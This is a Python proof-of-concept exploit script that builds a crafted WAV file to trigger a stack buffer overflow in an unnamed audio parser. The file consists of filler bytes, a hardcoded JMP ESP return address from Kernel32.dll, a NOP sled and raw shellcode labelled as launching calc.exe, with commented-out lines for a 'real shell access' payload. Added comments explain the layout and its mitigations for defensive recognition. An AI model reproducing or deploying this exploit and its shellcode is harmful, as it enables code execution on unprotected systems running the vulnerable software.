#!/usr/bin/env python
# Proof-of-concept generator for a stack-buffer-overflow crash in a WAV
# parser. It writes a crafted file (`exploit.wav`) whose contents are a fixed
# filler, a 4-byte saved-return-address overwrite, a short NOP sled and an
# embedded payload blob. The vulnerable application is not identified on this
# page. From a defensive standpoint the layout below (thousands of repeated
# 0x41 bytes, then 0x90 bytes, then an opaque binary blob inside a file with
# a .wav extension) is the pattern that file scanners and crash triage should
# recognise as a crafted input rather than audio.
import struct
filename="exploit.wav"
# 4112 bytes of 'A' (0x41). Presumably the distance from the start of the
# overflowed buffer to the saved return address; nothing on this page
# confirms the target or the buffer size.
fill ="A"*4112
#eip = struct.pack('<I',0x42424242) # EIP overwrite verification
# Saved-return-address overwrite, packed as a little-endian unsigned 32-bit
# value. The address is an absolute location inside one specific build of
# Kernel32.dll (per the author's comment, a JMP ESP), so it is only valid
# on a system where that module loads at that fixed base. ASLR randomises
# module bases and DEP makes the stack non-executable; either mitigation
# defeats this PoC as written, which is why it targets a non-mitigated host.
eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll
# 10-byte NOP (0x90) sled placed between the overwrite and the payload.
offset = "\x90"*10
# Upper bound on payload bytes after the overwrite; only referenced by the
# commented-out padding line further down.
available_shellcode_space = 320
# Place for calc.exe shellcode
# Raw payload bytes. The author labels this calc.exe shellcode; nothing on
# this page verifies what it actually does, so treat it as opaque hostile
# bytes and do not run a file containing it outside an isolated lab.
calc = ("\xba\x86\x2c\x9a\x7b\xd9\xc2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x89\xce\x6f\x87\x7d\x8c"
"\x90\x78\x7d\xf1\x19\x9d\x4c\x31\x7d\xd5\xfe\x81\xf5\xbb\xf2"
"\x6a\x5b\x28\x81\x1f\x74\x5f\x22\x95\xa2\x6e\xb3\x86\x97\xf1"
"\x37\xd5\xcb\xd1\x06\x16\x1e\x13\x4f\x4b\xd3\x41\x18\x07\x46"
"\x76\x2d\x5d\x5b\xfd\x7d\x73\xdb\xe2\x35\x72\xca\xb4\x4e\x2d"
"\xcc\x37\x83\x45\x45\x20\xc0\x60\x1f\xdb\x32\x1e\x9e\x0d\x0b"
"\xdf\x0d\x70\xa4\x12\x4f\xb4\x02\xcd\x3a\xcc\x71\x70\x3d\x0b"
"\x08\xae\xc8\x88\xaa\x25\x6a\x75\x4b\xe9\xed\xfe\x47\x46\x79"
"\x58\x4b\x59\xae\xd2\x77\xd2\x51\x35\xfe\xa0\x75\x91\x5b\x72"
"\x17\x80\x01\xd5\x28\xd2\xea\x8a\x8c\x98\x06\xde\xbc\xc2\x4c"
"\x21\x32\x79\x22\x21\x4c\x82\x12\x4a\x7d\x09\xfd\x0d\x82\xd8"
"\xba\xe2\xc8\x41\xea\x6a\x95\x13\xaf\xf6\x26\xce\xf3\x0e\xa5"
"\xfb\x8b\xf4\xb5\x89\x8e\xb1\x71\x61\xe2\xaa\x17\x85\x51\xca"
"\x3d\xe6\x34\x58\xdd\xc7\xd3\xd8\x44\x18")
# Place for actual shellcode
# Empty placeholder (a tuple) for the alternative payload that the
# commented-out lines below refer to.
shell =()
#nop = "\x90"*(available_shellcode_space-len(shell)-len(offset))
#exploit = fill + eip + offset + shell + nop
# Final file contents: filler | return-address overwrite | NOP sled | payload.
exploit = fill + eip + offset + calc #loader for simple proof of concept for shell code
#exploit = fill + eip + offset + shell #loader for real shell access
# Truncates exploit.wav (the same path as `filename`), then reopens it and
# writes the buffer. The str-based "\x.." escapes and the text-mode "w"
# handle are Python 2-era semantics; the handle is closed explicitly rather
# than via `with`.
open('exploit.wav', 'w').close()
writeFile = open (filename, "w")
writeFile.write(exploit)
writeFile.close()